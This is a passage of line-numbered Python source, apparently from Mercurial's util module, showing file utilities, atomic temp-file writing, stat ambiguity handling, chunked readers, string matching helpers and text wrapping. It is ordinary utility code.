2104 2145 return (path.endswith(pycompat.ossep)
2105 2146 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2106 2147
2107 2148 def splitpath(path):
2108 2149 '''Split path by os.sep.
2109 2150 Note that this function does not use os.altsep because this is
2110 2151 an alternative of simple "xxx.split(os.sep)".
2111 2152 It is recommended to use os.path.normpath() before using this
2112 2153 function if need.'''
2113 2154 return path.split(pycompat.ossep)
2114 2155
2115 2156 def gui():
2116 2157 '''Are we running in a GUI?'''
2117 2158 if pycompat.isdarwin:
2118 2159 if 'SSH_CONNECTION' in encoding.environ:
2119 2160 # handle SSH access to a box where the user is logged in
2120 2161 return False
2121 2162 elif getattr(osutil, 'isgui', None):
2122 2163 # check if a CoreGraphics session is available
2123 2164 return osutil.isgui()
2124 2165 else:
2125 2166 # pure build; use a safe default
2126 2167 return True
2127 2168 else:
2128 2169 return pycompat.iswindows or encoding.environ.get("DISPLAY")
2129 2170
2130 2171 def mktempcopy(name, emptyok=False, createmode=None):
2131 2172 """Create a temporary file with the same contents from name
2132 2173
2133 2174 The permission bits are copied from the original file.
2134 2175
2135 2176 If the temporary file is going to be truncated immediately, you
2136 2177 can use emptyok=True as an optimization.
2137 2178
2138 2179 Returns the name of the temporary file.
2139 2180 """
2140 2181 d, fn = os.path.split(name)
2141 2182 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2142 2183 os.close(fd)
2143 2184 # Temporary files are created with mode 0600, which is usually not
2144 2185 # what we want. If the original file already exists, just copy
2145 2186 # its mode. Otherwise, manually obey umask.
2146 2187 copymode(name, temp, createmode)
2147 2188 if emptyok:
2148 2189 return temp
2149 2190 try:
2150 2191 try:
2151 2192 ifp = posixfile(name, "rb")
2152 2193 except IOError as inst:
2153 2194 if inst.errno == errno.ENOENT:
2154 2195 return temp
2155 2196 if not getattr(inst, 'filename', None):
2156 2197 inst.filename = name
2157 2198 raise
2158 2199 ofp = posixfile(temp, "wb")
2159 2200 for chunk in filechunkiter(ifp):
2160 2201 ofp.write(chunk)
2161 2202 ifp.close()
2162 2203 ofp.close()
2163 2204 except: # re-raises
2164 2205 try:
2165 2206 os.unlink(temp)
2166 2207 except OSError:
2167 2208 pass
2168 2209 raise
2169 2210 return temp
2170 2211
2171 2212 class filestat(object):
2172 2213 """help to exactly detect change of a file
2173 2214
2174 2215 'stat' attribute is result of 'os.stat()' if specified 'path'
2175 2216 exists. Otherwise, it is None. This can avoid preparative
2176 2217 'exists()' examination on client side of this class.
2177 2218 """
2178 2219 def __init__(self, stat):
2179 2220 self.stat = stat
2180 2221
2181 2222 @classmethod
2182 2223 def frompath(cls, path):
2183 2224 try:
2184 2225 stat = os.stat(path)
2185 2226 except OSError as err:
2186 2227 if err.errno != errno.ENOENT:
2187 2228 raise
2188 2229 stat = None
2189 2230 return cls(stat)
2190 2231
2191 2232 @classmethod
2192 2233 def fromfp(cls, fp):
2193 2234 stat = os.fstat(fp.fileno())
2194 2235 return cls(stat)
2195 2236
2196 2237 __hash__ = object.__hash__
2197 2238
2198 2239 def __eq__(self, old):
2199 2240 try:
2200 2241 # if ambiguity between stat of new and old file is
2201 2242 # avoided, comparison of size, ctime and mtime is enough
2202 2243 # to exactly detect change of a file regardless of platform
2203 2244 return (self.stat.st_size == old.stat.st_size and
2204 2245 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2205 2246 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2206 2247 except AttributeError:
2207 2248 pass
2208 2249 try:
2209 2250 return self.stat is None and old.stat is None
2210 2251 except AttributeError:
2211 2252 return False
2212 2253
2213 2254 def isambig(self, old):
2214 2255 """Examine whether new (= self) stat is ambiguous against old one
2215 2256
2216 2257 "S[N]" below means stat of a file at N-th change:
2217 2258
2218 2259 - S[n-1].ctime < S[n].ctime: can detect change of a file
2219 2260 - S[n-1].ctime == S[n].ctime
2220 2261 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2221 2262 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2222 2263 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2223 2264 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2224 2265
2225 2266 Case (*2) above means that a file was changed twice or more at
2226 2267 same time in sec (= S[n-1].ctime), and comparison of timestamp
2227 2268 is ambiguous.
2228 2269
2229 2270 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2230 2271 timestamp is ambiguous".
2231 2272
2232 2273 But advancing mtime only in case (*2) doesn't work as
2233 2274 expected, because naturally advanced S[n].mtime in case (*1)
2234 2275 might be equal to manually advanced S[n-1 or earlier].mtime.
2235 2276
2236 2277 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2237 2278 treated as ambiguous regardless of mtime, to avoid overlooking
2238 2279 by confliction between such mtime.
2239 2280
2240 2281 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2241 2282 S[n].mtime", even if size of a file isn't changed.
2242 2283 """
2243 2284 try:
2244 2285 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2245 2286 except AttributeError:
2246 2287 return False
2247 2288
2248 2289 def avoidambig(self, path, old):
2249 2290 """Change file stat of specified path to avoid ambiguity
2250 2291
2251 2292 'old' should be previous filestat of 'path'.
2252 2293
2253 2294 This skips avoiding ambiguity, if a process doesn't have
2254 2295 appropriate privileges for 'path'. This returns False in this
2255 2296 case.
2256 2297
2257 2298 Otherwise, this returns True, as "ambiguity is avoided".
2258 2299 """
2259 2300 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2260 2301 try:
2261 2302 os.utime(path, (advanced, advanced))
2262 2303 except OSError as inst:
2263 2304 if inst.errno == errno.EPERM:
2264 2305 # utime() on the file created by another user causes EPERM,
2265 2306 # if a process doesn't have appropriate privileges
2266 2307 return False
2267 2308 raise
2268 2309 return True
2269 2310
2270 2311 def __ne__(self, other):
2271 2312 return not self == other
2272 2313
2273 2314 class atomictempfile(object):
2274 2315 '''writable file object that atomically updates a file
2275 2316
2276 2317 All writes will go to a temporary copy of the original file. Call
2277 2318 close() when you are done writing, and atomictempfile will rename
2278 2319 the temporary copy to the original name, making the changes
2279 2320 visible. If the object is destroyed without being closed, all your
2280 2321 writes are discarded.
2281 2322
2282 2323 checkambig argument of constructor is used with filestat, and is
2283 2324 useful only if target file is guarded by any lock (e.g. repo.lock
2284 2325 or repo.wlock).
2285 2326 '''
2286 2327 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2287 2328 self.__name = name # permanent name
2288 2329 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2289 2330 createmode=createmode)
2290 2331 self._fp = posixfile(self._tempname, mode)
2291 2332 self._checkambig = checkambig
2292 2333
2293 2334 # delegated methods
2294 2335 self.read = self._fp.read
2295 2336 self.write = self._fp.write
2296 2337 self.seek = self._fp.seek
2297 2338 self.tell = self._fp.tell
2298 2339 self.fileno = self._fp.fileno
2299 2340
2300 2341 def close(self):
2301 2342 if not self._fp.closed:
2302 2343 self._fp.close()
2303 2344 filename = localpath(self.__name)
2304 2345 oldstat = self._checkambig and filestat.frompath(filename)
2305 2346 if oldstat and oldstat.stat:
2306 2347 rename(self._tempname, filename)
2307 2348 newstat = filestat.frompath(filename)
2308 2349 if newstat.isambig(oldstat):
2309 2350 # stat of changed file is ambiguous to original one
2310 2351 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2311 2352 os.utime(filename, (advanced, advanced))
2312 2353 else:
2313 2354 rename(self._tempname, filename)
2314 2355
2315 2356 def discard(self):
2316 2357 if not self._fp.closed:
2317 2358 try:
2318 2359 os.unlink(self._tempname)
2319 2360 except OSError:
2320 2361 pass
2321 2362 self._fp.close()
2322 2363
2323 2364 def __del__(self):
2324 2365 if safehasattr(self, '_fp'): # constructor actually did something
2325 2366 self.discard()
2326 2367
2327 2368 def __enter__(self):
2328 2369 return self
2329 2370
2330 2371 def __exit__(self, exctype, excvalue, traceback):
2331 2372 if exctype is not None:
2332 2373 self.discard()
2333 2374 else:
2334 2375 self.close()
2335 2376
2336 2377 def unlinkpath(f, ignoremissing=False):
2337 2378 """unlink and remove the directory if it is empty"""
2338 2379 if ignoremissing:
2339 2380 tryunlink(f)
2340 2381 else:
2341 2382 unlink(f)
2342 2383 # try removing directories that might now be empty
2343 2384 try:
2344 2385 removedirs(os.path.dirname(f))
2345 2386 except OSError:
2346 2387 pass
2347 2388
2348 2389 def tryunlink(f):
2349 2390 """Attempt to remove a file, ignoring ENOENT errors."""
2350 2391 try:
2351 2392 unlink(f)
2352 2393 except OSError as e:
2353 2394 if e.errno != errno.ENOENT:
2354 2395 raise
2355 2396
2356 2397 def makedirs(name, mode=None, notindexed=False):
2357 2398 """recursive directory creation with parent mode inheritance
2358 2399
2359 2400 Newly created directories are marked as "not to be indexed by
2360 2401 the content indexing service", if ``notindexed`` is specified
2361 2402 for "write" mode access.
2362 2403 """
2363 2404 try:
2364 2405 makedir(name, notindexed)
2365 2406 except OSError as err:
2366 2407 if err.errno == errno.EEXIST:
2367 2408 return
2368 2409 if err.errno != errno.ENOENT or not name:
2369 2410 raise
2370 2411 parent = os.path.dirname(os.path.abspath(name))
2371 2412 if parent == name:
2372 2413 raise
2373 2414 makedirs(parent, mode, notindexed)
2374 2415 try:
2375 2416 makedir(name, notindexed)
2376 2417 except OSError as err:
2377 2418 # Catch EEXIST to handle races
2378 2419 if err.errno == errno.EEXIST:
2379 2420 return
2380 2421 raise
2381 2422 if mode is not None:
2382 2423 os.chmod(name, mode)
2383 2424
2384 2425 def readfile(path):
2385 2426 with open(path, 'rb') as fp:
2386 2427 return fp.read()
2387 2428
2388 2429 def writefile(path, text):
2389 2430 with open(path, 'wb') as fp:
2390 2431 fp.write(text)
2391 2432
2392 2433 def appendfile(path, text):
2393 2434 with open(path, 'ab') as fp:
2394 2435 fp.write(text)
2395 2436
2396 2437 class chunkbuffer(object):
2397 2438 """Allow arbitrary sized chunks of data to be efficiently read from an
2398 2439 iterator over chunks of arbitrary size."""
2399 2440
2400 2441 def __init__(self, in_iter):
2401 2442 """in_iter is the iterator that's iterating over the input chunks."""
2402 2443 def splitbig(chunks):
2403 2444 for chunk in chunks:
2404 2445 if len(chunk) > 2**20:
2405 2446 pos = 0
2406 2447 while pos < len(chunk):
2407 2448 end = pos + 2 ** 18
2408 2449 yield chunk[pos:end]
2409 2450 pos = end
2410 2451 else:
2411 2452 yield chunk
2412 2453 self.iter = splitbig(in_iter)
2413 2454 self._queue = collections.deque()
2414 2455 self._chunkoffset = 0
2415 2456
2416 2457 def read(self, l=None):
2417 2458 """Read L bytes of data from the iterator of chunks of data.
2418 2459 Returns less than L bytes if the iterator runs dry.
2419 2460
2420 2461 If size parameter is omitted, read everything"""
2421 2462 if l is None:
2422 2463 return ''.join(self.iter)
2423 2464
2424 2465 left = l
2425 2466 buf = []
2426 2467 queue = self._queue
2427 2468 while left > 0:
2428 2469 # refill the queue
2429 2470 if not queue:
2430 2471 target = 2**18
2431 2472 for chunk in self.iter:
2432 2473 queue.append(chunk)
2433 2474 target -= len(chunk)
2434 2475 if target <= 0:
2435 2476 break
2436 2477 if not queue:
2437 2478 break
2438 2479
2439 2480 # The easy way to do this would be to queue.popleft(), modify the
2440 2481 # chunk (if necessary), then queue.appendleft(). However, for cases
2441 2482 # where we read partial chunk content, this incurs 2 dequeue
2442 2483 # mutations and creates a new str for the remaining chunk in the
2443 2484 # queue. Our code below avoids this overhead.
2444 2485
2445 2486 chunk = queue[0]
2446 2487 chunkl = len(chunk)
2447 2488 offset = self._chunkoffset
2448 2489
2449 2490 # Use full chunk.
2450 2491 if offset == 0 and left >= chunkl:
2451 2492 left -= chunkl
2452 2493 queue.popleft()
2453 2494 buf.append(chunk)
2454 2495 # self._chunkoffset remains at 0.
2455 2496 continue
2456 2497
2457 2498 chunkremaining = chunkl - offset
2458 2499
2459 2500 # Use all of unconsumed part of chunk.
2460 2501 if left >= chunkremaining:
2461 2502 left -= chunkremaining
2462 2503 queue.popleft()
2463 2504 # offset == 0 is enabled by block above, so this won't merely
2464 2505 # copy via ``chunk[0:]``.
2465 2506 buf.append(chunk[offset:])
2466 2507 self._chunkoffset = 0
2467 2508
2468 2509 # Partial chunk needed.
2469 2510 else:
2470 2511 buf.append(chunk[offset:offset + left])
2471 2512 self._chunkoffset += left
2472 2513 left -= chunkremaining
2473 2514
2474 2515 return ''.join(buf)
2475 2516
2476 2517 def filechunkiter(f, size=131072, limit=None):
2477 2518 """Create a generator that produces the data in the file size
2478 2519 (default 131072) bytes at a time, up to optional limit (default is
2479 2520 to read all data). Chunks may be less than size bytes if the
2480 2521 chunk is the last chunk in the file, or the file is a socket or
2481 2522 some other type of file that sometimes reads less data than is
2482 2523 requested."""
2483 2524 assert size >= 0
2484 2525 assert limit is None or limit >= 0
2485 2526 while True:
2486 2527 if limit is None:
2487 2528 nbytes = size
2488 2529 else:
2489 2530 nbytes = min(limit, size)
2490 2531 s = nbytes and f.read(nbytes)
2491 2532 if not s:
2492 2533 break
2493 2534 if limit:
2494 2535 limit -= len(s)
2495 2536 yield s
2496 2537
2497 2538 class cappedreader(object):
2498 2539 """A file object proxy that allows reading up to N bytes.
2499 2540
2500 2541 Given a source file object, instances of this type allow reading up to
2501 2542 N bytes from that source file object. Attempts to read past the allowed
2502 2543 limit are treated as EOF.
2503 2544
2504 2545 It is assumed that I/O is not performed on the original file object
2505 2546 in addition to I/O that is performed by this instance. If there is,
2506 2547 state tracking will get out of sync and unexpected results will ensue.
2507 2548 """
2508 2549 def __init__(self, fh, limit):
2509 2550 """Allow reading up to <limit> bytes from <fh>."""
2510 2551 self._fh = fh
2511 2552 self._left = limit
2512 2553
2513 2554 def read(self, n=-1):
2514 2555 if not self._left:
2515 2556 return b''
2516 2557
2517 2558 if n < 0:
2518 2559 n = self._left
2519 2560
2520 2561 data = self._fh.read(min(n, self._left))
2521 2562 self._left -= len(data)
2522 2563 assert self._left >= 0
2523 2564
2524 2565 return data
2525 2566
2526 2567 def stringmatcher(pattern, casesensitive=True):
2527 2568 """
2528 2569 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2529 2570 returns the matcher name, pattern, and matcher function.
2530 2571 missing or unknown prefixes are treated as literal matches.
2531 2572
2532 2573 helper for tests:
2533 2574 >>> def test(pattern, *tests):
2534 2575 ... kind, pattern, matcher = stringmatcher(pattern)
2535 2576 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2536 2577 >>> def itest(pattern, *tests):
2537 2578 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2538 2579 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2539 2580
2540 2581 exact matching (no prefix):
2541 2582 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2542 2583 ('literal', 'abcdefg', [False, False, True])
2543 2584
2544 2585 regex matching ('re:' prefix)
2545 2586 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2546 2587 ('re', 'a.+b', [False, False, True])
2547 2588
2548 2589 force exact matches ('literal:' prefix)
2549 2590 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2550 2591 ('literal', 're:foobar', [False, True])
2551 2592
2552 2593 unknown prefixes are ignored and treated as literals
2553 2594 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2554 2595 ('literal', 'foo:bar', [False, False, True])
2555 2596
2556 2597 case insensitive regex matches
2557 2598 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2558 2599 ('re', 'A.+b', [False, False, True])
2559 2600
2560 2601 case insensitive literal matches
2561 2602 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2562 2603 ('literal', 'ABCDEFG', [False, False, True])
2563 2604 """
2564 2605 if pattern.startswith('re:'):
2565 2606 pattern = pattern[3:]
2566 2607 try:
2567 2608 flags = 0
2568 2609 if not casesensitive:
2569 2610 flags = remod.I
2570 2611 regex = remod.compile(pattern, flags)
2571 2612 except remod.error as e:
2572 2613 raise error.ParseError(_('invalid regular expression: %s')
2573 2614 % e)
2574 2615 return 're', pattern, regex.search
2575 2616 elif pattern.startswith('literal:'):
2576 2617 pattern = pattern[8:]
2577 2618
2578 2619 match = pattern.__eq__
2579 2620
2580 2621 if not casesensitive:
2581 2622 ipat = encoding.lower(pattern)
2582 2623 match = lambda s: ipat == encoding.lower(s)
2583 2624 return 'literal', pattern, match
2584 2625
2585 2626 def shortuser(user):
2586 2627 """Return a short representation of a user name or email address."""
2587 2628 f = user.find('@')
2588 2629 if f >= 0:
2589 2630 user = user[:f]
2590 2631 f = user.find('<')
2591 2632 if f >= 0:
2592 2633 user = user[f + 1:]
2593 2634 f = user.find(' ')
2594 2635 if f >= 0:
2595 2636 user = user[:f]
2596 2637 f = user.find('.')
2597 2638 if f >= 0:
2598 2639 user = user[:f]
2599 2640 return user
2600 2641
2601 2642 def emailuser(user):
2602 2643 """Return the user portion of an email address."""
2603 2644 f = user.find('@')
2604 2645 if f >= 0:
2605 2646 user = user[:f]
2606 2647 f = user.find('<')
2607 2648 if f >= 0:
2608 2649 user = user[f + 1:]
2609 2650 return user
2610 2651
2611 2652 def email(author):
2612 2653 '''get email of author.'''
2613 2654 r = author.find('>')
2614 2655 if r == -1:
2615 2656 r = None
2616 2657 return author[author.find('<') + 1:r]
2617 2658
2618 2659 def ellipsis(text, maxlength=400):
2619 2660 """Trim string to at most maxlength (default: 400) columns in display."""
2620 2661 return encoding.trim(text, maxlength, ellipsis='...')
2621 2662
2622 2663 def unitcountfn(*unittable):
2623 2664 '''return a function that renders a readable count of some quantity'''
2624 2665
2625 2666 def go(count):
2626 2667 for multiplier, divisor, format in unittable:
2627 2668 if abs(count) >= divisor * multiplier:
2628 2669 return format % (count / float(divisor))
2629 2670 return unittable[-1][2] % count
2630 2671
2631 2672 return go
2632 2673
2633 2674 def processlinerange(fromline, toline):
2634 2675 """Check that linerange <fromline>:<toline> makes sense and return a
2635 2676 0-based range.
2636 2677
2637 2678 >>> processlinerange(10, 20)
2638 2679 (9, 20)
2639 2680 >>> processlinerange(2, 1)
2640 2681 Traceback (most recent call last):
2641 2682 ...
2642 2683 ParseError: line range must be positive
2643 2684 >>> processlinerange(0, 5)
2644 2685 Traceback (most recent call last):
2645 2686 ...
2646 2687 ParseError: fromline must be strictly positive
2647 2688 """
2648 2689 if toline - fromline < 0:
2649 2690 raise error.ParseError(_("line range must be positive"))
2650 2691 if fromline < 1:
2651 2692 raise error.ParseError(_("fromline must be strictly positive"))
2652 2693 return fromline - 1, toline
2653 2694
2654 2695 bytecount = unitcountfn(
2655 2696 (100, 1 << 30, _('%.0f GB')),
2656 2697 (10, 1 << 30, _('%.1f GB')),
2657 2698 (1, 1 << 30, _('%.2f GB')),
2658 2699 (100, 1 << 20, _('%.0f MB')),
2659 2700 (10, 1 << 20, _('%.1f MB')),
2660 2701 (1, 1 << 20, _('%.2f MB')),
2661 2702 (100, 1 << 10, _('%.0f KB')),
2662 2703 (10, 1 << 10, _('%.1f KB')),
2663 2704 (1, 1 << 10, _('%.2f KB')),
2664 2705 (1, 1, _('%.0f bytes')),
2665 2706 )
2666 2707
2667 2708 class transformingwriter(object):
2668 2709 """Writable file wrapper to transform data by function"""
2669 2710
2670 2711 def __init__(self, fp, encode):
2671 2712 self._fp = fp
2672 2713 self._encode = encode
2673 2714
2674 2715 def close(self):
2675 2716 self._fp.close()
2676 2717
2677 2718 def flush(self):
2678 2719 self._fp.flush()
2679 2720
2680 2721 def write(self, data):
2681 2722 return self._fp.write(self._encode(data))
2682 2723
2683 2724 # Matches a single EOL which can either be a CRLF where repeated CR
2684 2725 # are removed or a LF. We do not care about old Macintosh files, so a
2685 2726 # stray CR is an error.
2686 2727 _eolre = remod.compile(br'\r*\n')
2687 2728
2688 2729 def tolf(s):
2689 2730 return _eolre.sub('\n', s)
2690 2731
2691 2732 def tocrlf(s):
2692 2733 return _eolre.sub('\r\n', s)
2693 2734
2694 2735 def _crlfwriter(fp):
2695 2736 return transformingwriter(fp, tocrlf)
2696 2737
2697 2738 if pycompat.oslinesep == '\r\n':
2698 2739 tonativeeol = tocrlf
2699 2740 fromnativeeol = tolf
2700 2741 nativeeolwriter = _crlfwriter
2701 2742 else:
2702 2743 tonativeeol = pycompat.identity
2703 2744 fromnativeeol = pycompat.identity
2704 2745 nativeeolwriter = pycompat.identity
2705 2746
2706 2747 def escapestr(s):
2707 2748 # call underlying function of s.encode('string_escape') directly for
2708 2749 # Python 3 compatibility
2709 2750 return codecs.escape_encode(s)[0]
2710 2751
2711 2752 def unescapestr(s):
2712 2753 return codecs.escape_decode(s)[0]
2713 2754
2714 2755 def forcebytestr(obj):
2715 2756 """Portably format an arbitrary object (e.g. exception) into a byte
2716 2757 string."""
2717 2758 try:
2718 2759 return pycompat.bytestr(obj)
2719 2760 except UnicodeEncodeError:
2720 2761 # non-ascii string, may be lossy
2721 2762 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2722 2763
2723 2764 def uirepr(s):
2724 2765 # Avoid double backslash in Windows path repr()
2725 2766 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2726 2767
2727 2768 # delay import of textwrap
2728 2769 def MBTextWrapper(**kwargs):
2729 2770 class tw(textwrap.TextWrapper):
2730 2771 """
2731 2772 Extend TextWrapper for width-awareness.
2732 2773
2733 2774 Neither number of 'bytes' in any encoding nor 'characters' is
2734 2775 appropriate to calculate terminal columns for specified string.
2735 2776
2736 2777 Original TextWrapper implementation uses built-in 'len()' directly,
2737 2778 so overriding is needed to use width information of each characters.
2738 2779
2739 2780 In addition, characters classified into 'ambiguous' width are
2740 2781 treated as wide in East Asian area, but as narrow in other.
2741 2782
2742 2783 This requires use decision to determine width of such characters.
2743 2784 """
2744 2785 def _cutdown(self, ucstr, space_left):
2745 2786 l = 0
2746 2787 colwidth = encoding.ucolwidth
2747 2788 for i in xrange(len(ucstr)):
2748 2789 l += colwidth(ucstr[i])
2749 2790 if space_left < l:
2750 2791 return (ucstr[:i], ucstr[i:])
2751 2792 return ucstr, ''
2752 2793
2753 2794 # overriding of base class
2754 2795 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2755 2796 space_left = max(width - cur_len, 1)
2756 2797
2757 2798 if self.break_long_words:
2758 2799 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2759 2800 cur_line.append(cut)
2760 2801 reversed_chunks[-1] = res
2761 2802 elif not cur_line:
2762 2803 cur_line.append(reversed_chunks.pop())
2763 2804
2764 2805 # this overriding code is imported from TextWrapper of Python 2.6
2765 2806 # to calculate columns of string by 'encoding.ucolwidth()'
2766 2807 def _wrap_chunks(self, chunks):
2767 2808 colwidth = encoding.ucolwidth
2768 2809
2769 2810 lines = []
2770 2811 if self.width <= 0:
2771 2812 raise ValueError("invalid width %r (must be > 0)" % self.width)
2772 2813
2773 2814 # Arrange in reverse order so items can be efficiently popped
2774 2815 # from a stack of chucks.
2775 2816 chunks.reverse()
2776 2817
2777 2818 while chunks:
2778 2819
2779 2820 # Start the list of chunks that will make up the current line.
2780 2821 # cur_len is just the length of all the chunks in cur_line.
2781 2822 cur_line = []
2782 2823 cur_len = 0
2783 2824
2784 2825 # Figure out which static string will prefix this line.
2785 2826 if lines:
2786 2827 indent = self.subsequent_indent
2787 2828 else:
2788 2829 indent = self.initial_indent
2789 2830
2790 2831 # Maximum width for this line.
2791 2832 width = self.width - len(indent)
2792 2833
2793 2834 # First chunk on line is whitespace -- drop it, unless this
2794 2835 # is the very beginning of the text (i.e. no lines started yet).
2795 2836 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2796 2837 del chunks[-1]
2797 2838
2798 2839 while chunks:
2799 2840 l = colwidth(chunks[-1])
2800 2841
2801 2842 # Can at least squeeze this chunk onto the current line.
2802 2843 if cur_len + l <= width:
2803 2844 cur_line.append(chunks.pop())
2804 2845 cur_len += l
2805 2846
2806 2847 # Nope, this line is full.
2807 2848 else:
2808 2849 break
2809 2850
2810 2851 # The current line is full, and the next chunk is too big to
2811 2852 # fit on *any* line (not just this one).
2812 2853 if chunks and colwidth(chunks[-1]) > width:
2813 2854 self._handle_long_word(chunks, cur_line, cur_len, width)
2814 2855
2815 2856 # If the last chunk on this line is all whitespace, drop it.
2816 2857 if (self.drop_whitespace and
2817 2858 cur_line and cur_line[-1].strip() == r''):
2818 2859 del cur_line[-1]
2819 2860
2820 2861 # Convert current line back to a string and store it in list
2821 2862 # of all lines (return value).
2822 2863 if cur_line:
2823 2864 lines.append(indent + r''.join(cur_line))
2824 2865
2825 2866 return lines
2826 2867
2827 2868 global MBTextWrapper
2828 2869 MBTextWrapper = tw
2829 2870 return tw(**kwargs)
2830 2871
2831 2872 def wrap(line, width, initindent='', hangindent=''):
2832 2873 maxindent = max(len(hangindent), len(initindent))
2833 2874 if width <= maxindent:
2834 2875 # adjust for weird terminal size
2835 2876 width = max(78, maxindent + 1)
2836 2877 line = line.decode(pycompat.sysstr(encoding.encoding),
2837 2878 pycompat.sysstr(encoding.encodingmode))
2838 2879 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2839 2880 pycompat.sysstr(encoding.encodingmode))
2840 2881 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2841 2882 pycompat.sysstr(encoding.encodingmode))
2842 2883 wrapper = MBTextWrapper(width=width,
2843 2884 initial_indent=initindent,
2844 2885 subsequent_indent=hangindent)
2845 2886 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2846 2887
2847 2888 if (pyplatform.python_implementation() == 'CPython' and
2848 2889 sys.version_info < (3, 0)):
2849 2890 # There is an issue in CPython that some IO methods do not handle EINTR
2850 2891 # correctly. The following table shows what CPython version (and functions)
2851 2892 # are affected (buggy: has the EINTR bug, okay: otherwise):
2852 2893 #
2853 2894 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2854 2895 # --------------------------------------------------
2855 2896 # fp.__iter__ | buggy | buggy | okay
2856 2897 # fp.read* | buggy | okay [1] | okay
2857 2898 #
2858 2899 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2859 2900 #
2860 2901 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2861 2902 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2862 2903 #
2863 2904 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2864 2905 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2865 2906 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2866 2907 # fp.__iter__ but not other fp.read* methods.
2867 2908 #
2868 2909 # On modern systems like Linux, the "read" syscall cannot be interrupted
2869 2910 # when reading "fast" files like on-disk files. So the EINTR issue only
2870 2911 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2871 2912 # files approximately as "fast" files and use the fast (unsafe) code path,
2872 2913 # to minimize the performance impact.
2873 2914 if sys.version_info >= (2, 7, 4):
2874 2915 # fp.readline deals with EINTR correctly, use it as a workaround.
2875 2916 def _safeiterfile(fp):
2876 2917 return iter(fp.readline, '')
2877 2918 else:
2878 2919 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2879 2920 # note: this may block longer than necessary because of bufsize.
2880 2921 def _safeiterfile(fp, bufsize=4096):
2881 2922 fd = fp.fileno()
2882 2923 line = ''
2883 2924 while True:
2884 2925 try:
2885 2926 buf = os.read(fd, bufsize)
2886 2927 except OSError as ex:
2887 2928 # os.read only raises EINTR before any data is read
2888 2929 if ex.errno == errno.EINTR:
2889 2930 continue
2890 2931 else:
2891 2932 raise
2892 2933 line += buf
2893 2934 if '\n' in buf:
2894 2935 splitted = line.splitlines(True)
2895 2936 line = ''
2896 2937 for l in splitted:
2897 2938 if l[-1] == '\n':
2898 2939 yield l
2899 2940 else:
2900 2941 line = l
2901 2942 if not buf:
2902 2943 break
2903 2944 if line:
2904 2945 yield line
2905 2946
2906 2947 def iterfile(fp):
2907 2948 fastpath = True
2908 2949 if type(fp) is file:
2909 2950 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2910 2951 if fastpath:
2911 2952 return fp
2912 2953 else:
2913 2954 return _safeiterfile(fp)
2914 2955 else:
2915 2956 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2916 2957 def iterfile(fp):
2917 2958 return fp
2918 2959
2919 2960 def iterlines(iterator):
2920 2961 for chunk in iterator:
2921 2962 for line in chunk.splitlines():
2922 2963 yield line
2923 2964
2924 2965 def expandpath(path):
2925 2966 return os.path.expanduser(os.path.expandvars(path))
2926 2967
2927 2968 def hgcmd():
2928 2969 """Return the command used to execute current hg
2929 2970
2930 2971 This is different from hgexecutable() because on Windows we want
2931 2972 to avoid things opening new shell windows like batch files, so we
2932 2973 get either the python call or current executable.
2933 2974 """
2934 2975 if mainfrozen():
2935 2976 if getattr(sys, 'frozen', None) == 'macosx_app':
2936 2977 # Env variable set by py2app
2937 2978 return [encoding.environ['EXECUTABLEPATH']]
2938 2979 else:
2939 2980 return [pycompat.sysexecutable]
2940 2981 return gethgcmd()
2941 2982
2942 2983 def rundetached(args, condfn):
2943 2984 """Execute the argument list in a detached process.
2944 2985
2945 2986 condfn is a callable which is called repeatedly and should return
2946 2987 True once the child process is known to have started successfully.
2947 2988 At this point, the child process PID is returned. If the child
2948 2989 process fails to start or finishes before condfn() evaluates to
2949 2990 True, return -1.
2950 2991 """
2951 2992 # Windows case is easier because the child process is either
2952 2993 # successfully starting and validating the condition or exiting
2953 2994 # on failure. We just poll on its PID. On Unix, if the child
2954 2995 # process fails to start, it will be left in a zombie state until
2955 2996 # the parent wait on it, which we cannot do since we expect a long
